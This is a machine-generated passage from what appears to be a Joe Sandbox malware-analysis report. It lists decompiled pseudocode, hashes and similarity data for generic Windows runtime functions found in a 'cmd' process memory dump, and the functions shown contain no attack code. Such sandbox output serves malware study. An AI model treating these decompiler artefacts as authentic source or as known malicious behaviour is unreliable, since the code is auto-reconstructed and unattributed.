                                                                                                                                          • Opcode ID: 672d2b6a54f1b5534f9feb11c3dc600eacbd26ac348feb9018746d41569d796e
                                                                                                                                          • Instruction ID: cf5532f331c6e4f4523bab92a3e40f990f8006df8bf49d5d04a700b6da5fdd81
                                                                                                                                          • Opcode Fuzzy Hash: 672d2b6a54f1b5534f9feb11c3dc600eacbd26ac348feb9018746d41569d796e
                                                                                                                                          • Instruction Fuzzy Hash: 931112749106099FDB04DFA9D841BADFBF4FF08300F0442B6E519EB341D6349940DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDDB60 Relevance: .0, Instructions: 43COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BDDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E03BDDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E03BDE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L03BDE8B0(__ecx, _t14, 0xfff);
							L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                                                                          0x03bddb64
                                                                                                                                          0x03bddb66
                                                                                                                                          0x03bddb6b
                                                                                                                                          0x03bddbaa
                                                                                                                                          0x03bddb71
                                                                                                                                          0x03bddb76
                                                                                                                                          0x03bddb7a
                                                                                                                                          0x03bddba3
                                                                                                                                          0x03bddb7c
                                                                                                                                          0x03bddb87
                                                                                                                                          0x03bddb8b
                                                                                                                                          0x03c34fa1
                                                                                                                                          0x03c34fb3
                                                                                                                                          0x03c34fb8
                                                                                                                                          0x03bddb91
                                                                                                                                          0x03bddb96
                                                                                                                                          0x03bddb98
                                                                                                                                          0x03bddb98
                                                                                                                                          0x03bddb8b
                                                                                                                                          0x03bddb7a
                                                                                                                                          0x03bddb9d
                                                                                                                                          0x03bddba2

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                          • Instruction ID: 0d46628712d4ceae7395370a0b8ceb45d673e19a4bbea1fd3fec233ccdd9f158
                                                                                                                                          • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                                                                          • Instruction Fuzzy Hash: 86F0C8372416229BD332DA558880B67A6958F81A6CF1900B9B1459F244D970980286D4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDB1E1 Relevance: .0, Instructions: 42COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BDB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03BF7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03BF7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E03C57016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                          0x03bdb1e8
                                                                                                                                          0x03bdb1ea
                                                                                                                                          0x03bdb1f3
                                                                                                                                          0x03c34a17
                                                                                                                                          0x03bdb1f9
                                                                                                                                          0x03bdb1f9
                                                                                                                                          0x03bdb1f9
                                                                                                                                          0x03bdb201
                                                                                                                                          0x03c34a21
                                                                                                                                          0x03c34a2e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c34a3b
                                                                                                                                          0x03c34a4d
                                                                                                                                          0x03c34a3d
                                                                                                                                          0x03c34a46
                                                                                                                                          0x03c34a46
                                                                                                                                          0x03c34a55
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bdb20a
                                                                                                                                          0x03bdb20a
                                                                                                                                          0x03bdb20a
                                                                                                                                          0x03bdb20a

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                          • Instruction ID: 54ebfd34f6d86043e922c06511506805bafed86c0fd4d87425821ccb67c7cc73
                                                                                                                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                                                          • Instruction Fuzzy Hash: 9D01D1376006809FD726DB5AC805F69BB98EF82758F0E00F1FA14CF6B1EA78C940C254
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C6FE87 Relevance: .0, Instructions: 38COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                          			E03C6FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x3ccd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03BF7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                                                                          0x03c6fe96
                                                                                                                                          0x03c6fe9e
                                                                                                                                          0x03c6fea1
                                                                                                                                          0x03c6fead
                                                                                                                                          0x03c6feb3
                                                                                                                                          0x03c6feb9
                                                                                                                                          0x03c6fec3
                                                                                                                                          0x03c6fed5
                                                                                                                                          0x03c6fec5
                                                                                                                                          0x03c6fece
                                                                                                                                          0x03c6fece
                                                                                                                                          0x03c6fee0
                                                                                                                                          0x03c6fee1
                                                                                                                                          0x03c6fee3
                                                                                                                                          0x03c6fee8
                                                                                                                                          0x03c6fefb

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c634cadb9378593c88fd73a0b1537b7cdce2bd832ef84363ddf3557a750a3a44
                                                                                                                                          • Instruction ID: 8a8de98e53e62a2abd2fea63060449dc5e6f35d659ae7681943b3263cd704b9c
                                                                                                                                          • Opcode Fuzzy Hash: c634cadb9378593c88fd73a0b1537b7cdce2bd832ef84363ddf3557a750a3a44
                                                                                                                                          • Instruction Fuzzy Hash: D401FF74A00208AFCB14DFA8D546A6EBBF4EF09304F5441A9E515DF382DA35DA15DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9131B Relevance: .0, Instructions: 36COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                          			E03C9131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x3ccd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03BF7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                          0x03c9131b
                                                                                                                                          0x03c9132a
                                                                                                                                          0x03c91330
                                                                                                                                          0x03c91336
                                                                                                                                          0x03c9133e
                                                                                                                                          0x03c91341
                                                                                                                                          0x03c91344
                                                                                                                                          0x03c9134f
                                                                                                                                          0x03c91361
                                                                                                                                          0x03c91351
                                                                                                                                          0x03c9135a
                                                                                                                                          0x03c9135a
                                                                                                                                          0x03c9136c
                                                                                                                                          0x03c9136d
                                                                                                                                          0x03c9136f
                                                                                                                                          0x03c91374
                                                                                                                                          0x03c91387

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c532e994fea75c7953f1f553980e7dc6cab88105435eb06e5f8c6b5c0eb1349
                                                                                                                                          • Instruction ID: 0fcd3e5e52913f0920c664f549fd88809416ad98f5b4bb56e1fef260b76282f6
                                                                                                                                          • Opcode Fuzzy Hash: 8c532e994fea75c7953f1f553980e7dc6cab88105435eb06e5f8c6b5c0eb1349
                                                                                                                                          • Instruction Fuzzy Hash: 2B013175A01208AFCB04EFA9D546AAEB7F4FF08740F45406AF905EB341EA34DA10DB54
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA8F6A Relevance: .0, Instructions: 36COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                          			E03CA8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x3ccd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03BF7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                                                                          0x03ca8f6a
                                                                                                                                          0x03ca8f79
                                                                                                                                          0x03ca8f81
                                                                                                                                          0x03ca8f84
                                                                                                                                          0x03ca8f8b
                                                                                                                                          0x03ca8f91
                                                                                                                                          0x03ca8f94
                                                                                                                                          0x03ca8f9e
                                                                                                                                          0x03ca8fb0
                                                                                                                                          0x03ca8fa0
                                                                                                                                          0x03ca8fa9
                                                                                                                                          0x03ca8fa9
                                                                                                                                          0x03ca8fbb
                                                                                                                                          0x03ca8fbc
                                                                                                                                          0x03ca8fbe
                                                                                                                                          0x03ca8fc3
                                                                                                                                          0x03ca8fd6

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f04563500d6fa178d794a8f2c97b17b51ee9f8e8b6516fd84d7ea98a771b9de7
                                                                                                                                          • Instruction ID: 2519ccf9c0567c508a499c414dbf0173eff980a5c5cba671f021dc619c98a4f1
                                                                                                                                          • Opcode Fuzzy Hash: f04563500d6fa178d794a8f2c97b17b51ee9f8e8b6516fd84d7ea98a771b9de7
                                                                                                                                          • Instruction Fuzzy Hash: 2D013174A00309AFCB04EFA8D945AAEB7B4EF08700F504069B905EB380DA34DA10DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C91608 Relevance: .0, Instructions: 34COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                          			E03C91608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x3ccd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03BF7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                                                                          0x03c91608
                                                                                                                                          0x03c91617
                                                                                                                                          0x03c9161d
                                                                                                                                          0x03c91625
                                                                                                                                          0x03c91628
                                                                                                                                          0x03c9162b
                                                                                                                                          0x03c91636
                                                                                                                                          0x03c91648
                                                                                                                                          0x03c91638
                                                                                                                                          0x03c91641
                                                                                                                                          0x03c91641
                                                                                                                                          0x03c91653
                                                                                                                                          0x03c91654
                                                                                                                                          0x03c91656
                                                                                                                                          0x03c9165b
                                                                                                                                          0x03c9166e

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1047a61095087a2438c61a99cd158e80087385493d30deea41484e114efe9d5b
                                                                                                                                          • Instruction ID: ee71ed40753371b32c64901115dfe74f531c53fbf46211a285a049e0ab3d975e
                                                                                                                                          • Opcode Fuzzy Hash: 1047a61095087a2438c61a99cd158e80087385493d30deea41484e114efe9d5b
                                                                                                                                          • Instruction Fuzzy Hash: 1CF04F75E10248AFDB04EFA9D406A6EB7B4EF18300F4540A9A905EB281EA349900DB94
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BFC577 Relevance: .0, Instructions: 33COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BFC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E03BFC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x3bb11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E03CA88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                                                          0x03bfc577
                                                                                                                                          0x03bfc57d
                                                                                                                                          0x03bfc581
                                                                                                                                          0x03bfc5b5
                                                                                                                                          0x03bfc5b9
                                                                                                                                          0x03bfc5ce
                                                                                                                                          0x03bfc5ce
                                                                                                                                          0x03bfc5ca
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfc5ca
                                                                                                                                          0x03bfc5c4
                                                                                                                                          0x03bfc5c8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfc5ad
                                                                                                                                          0x00000000
                                                                                                                                          0x03bfc5af

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cf898b1c9835972cfaddb7bb475be8c48f4b6805d53c1bffd23507a4949b9a61
                                                                                                                                          • Instruction ID: c595ed73284a3fe37e5e00ab720b135b1bb49d6ecf7620f8f6f25a40e0516ea2
                                                                                                                                          • Opcode Fuzzy Hash: cf898b1c9835972cfaddb7bb475be8c48f4b6805d53c1bffd23507a4949b9a61
                                                                                                                                          • Instruction Fuzzy Hash: DEF067B29156A89ED721C6688006B32BFE8DB05768F49A4F6D6068B202C7A4D8C8C250
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1927A Relevance: .0, Instructions: 32COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                          			E03C1927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E03C1FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E03C192C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                                                          0x03c19295
                                                                                                                                          0x03c19299
                                                                                                                                          0x03c1929f
                                                                                                                                          0x03c192aa
                                                                                                                                          0x03c192ad
                                                                                                                                          0x03c192ae
                                                                                                                                          0x03c192af
                                                                                                                                          0x03c192b0
                                                                                                                                          0x03c192b4
                                                                                                                                          0x03c192bb
                                                                                                                                          0x03c192bb
                                                                                                                                          0x03c192c5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                          • Instruction ID: e1b71e697bef4c881d1a30bb584c81169caa4d6f5675eeb1f119ecd59c18920c
                                                                                                                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                                                          • Instruction Fuzzy Hash: 30E0E5322406002BD721DE06CC80B077669DF83720F054078B504DE242C6F5E919A7A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C92073 Relevance: .0, Instructions: 32COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                          			E03C92073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E03C8FD22(__ecx);
				_t19 =  *0x3cc849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3cc8748; // 0x0
					if(__eflags <= 0) {
						E03C91C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3cc8724 & 0x00000004;
							if(( *0x3cc8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3cc8724; // 0x0
					return E03C88DF1(__ebx, 0xc0000374, 0x3cc5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                                                          0x03c92076
                                                                                                                                          0x03c92078
                                                                                                                                          0x03c9207d
                                                                                                                                          0x03c92083
                                                                                                                                          0x03c920a4
                                                                                                                                          0x03c920aa
                                                                                                                                          0x03c920ac
                                                                                                                                          0x03c920b7
                                                                                                                                          0x03c920ba
                                                                                                                                          0x03c920bc
                                                                                                                                          0x03c920c9
                                                                                                                                          0x03c920c9
                                                                                                                                          0x03c920d0
                                                                                                                                          0x03c920d2
                                                                                                                                          0x00000000
                                                                                                                                          0x03c920d2
                                                                                                                                          0x03c920be
                                                                                                                                          0x03c920c3
                                                                                                                                          0x03c920c5
                                                                                                                                          0x03c920c7
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c920c7
                                                                                                                                          0x03c920bc
                                                                                                                                          0x03c920d4
                                                                                                                                          0x03c92085
                                                                                                                                          0x03c92085
                                                                                                                                          0x03c920a3
                                                                                                                                          0x03c920a3

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cb1311db0d8f363a934afe7744b5acd1a5f2b8cc939bd517ec25eefc24ff028a
                                                                                                                                          • Instruction ID: 4aba2cc2631b36e5163eb1385f6a350415d42117dd735cc563e05e3a9335981d
                                                                                                                                          • Opcode Fuzzy Hash: cb1311db0d8f363a934afe7744b5acd1a5f2b8cc939bd517ec25eefc24ff028a
                                                                                                                                          • Instruction Fuzzy Hash: D6F0827A4253999AEE22FB2461193D26B94D745114B4F2887E490DF204C9358A83DB24
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA8D34 Relevance: .0, Instructions: 32COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 43%
                                                                                                                                          			E03CA8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x3ccd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03BF7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                                                          0x03ca8d34
                                                                                                                                          0x03ca8d43
                                                                                                                                          0x03ca8d4b
                                                                                                                                          0x03ca8d4e
                                                                                                                                          0x03ca8d52
                                                                                                                                          0x03ca8d5c
                                                                                                                                          0x03ca8d6e
                                                                                                                                          0x03ca8d5e
                                                                                                                                          0x03ca8d67
                                                                                                                                          0x03ca8d67
                                                                                                                                          0x03ca8d79
                                                                                                                                          0x03ca8d7a
                                                                                                                                          0x03ca8d7c
                                                                                                                                          0x03ca8d81
                                                                                                                                          0x03ca8d94

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2534b06fff3fea725aa903e3df97538d76bd3fb90f93ccb619a07ce037645638
                                                                                                                                          • Instruction ID: 20cd53a4a4eba7b0555e5d7366de478d176b511087a68af1f87752896f519455
                                                                                                                                          • Opcode Fuzzy Hash: 2534b06fff3fea725aa903e3df97538d76bd3fb90f93ccb619a07ce037645638
                                                                                                                                          • Instruction Fuzzy Hash: 85F09074E147099FCB04EBA8D445A6EB7B4AF18300F5080A9E905EB280DA34D900DB54
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA8B58 Relevance: .0, Instructions: 31COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 36%
                                                                                                                                          			E03CA8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x3ccd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03BF7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E03C1B640(E03C19AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                                                          0x03ca8b67
                                                                                                                                          0x03ca8b6f
                                                                                                                                          0x03ca8b72
                                                                                                                                          0x03ca8b7d
                                                                                                                                          0x03ca8b8f
                                                                                                                                          0x03ca8b7f
                                                                                                                                          0x03ca8b88
                                                                                                                                          0x03ca8b88
                                                                                                                                          0x03ca8b9a
                                                                                                                                          0x03ca8b9b
                                                                                                                                          0x03ca8b9d
                                                                                                                                          0x03ca8ba2
                                                                                                                                          0x03ca8bb5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 61c1320869a0d8b7f7d890d96f6bb5df6e77cb0a30262f776a833708d01c19ba
                                                                                                                                          • Instruction ID: fc25b8b26ab90258c808cf525e2b2380f0ad3ac1e2079df8948ba950f44b7390
                                                                                                                                          • Opcode Fuzzy Hash: 61c1320869a0d8b7f7d890d96f6bb5df6e77cb0a30262f776a833708d01c19ba
                                                                                                                                          • Instruction Fuzzy Hash: 34F05EB4A14759ABDB04EBA8E906A6EB7B4AF04304F4404A9BA15DF280EB34D900D794
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD4F2E Relevance: .0, Instructions: 31COMMON
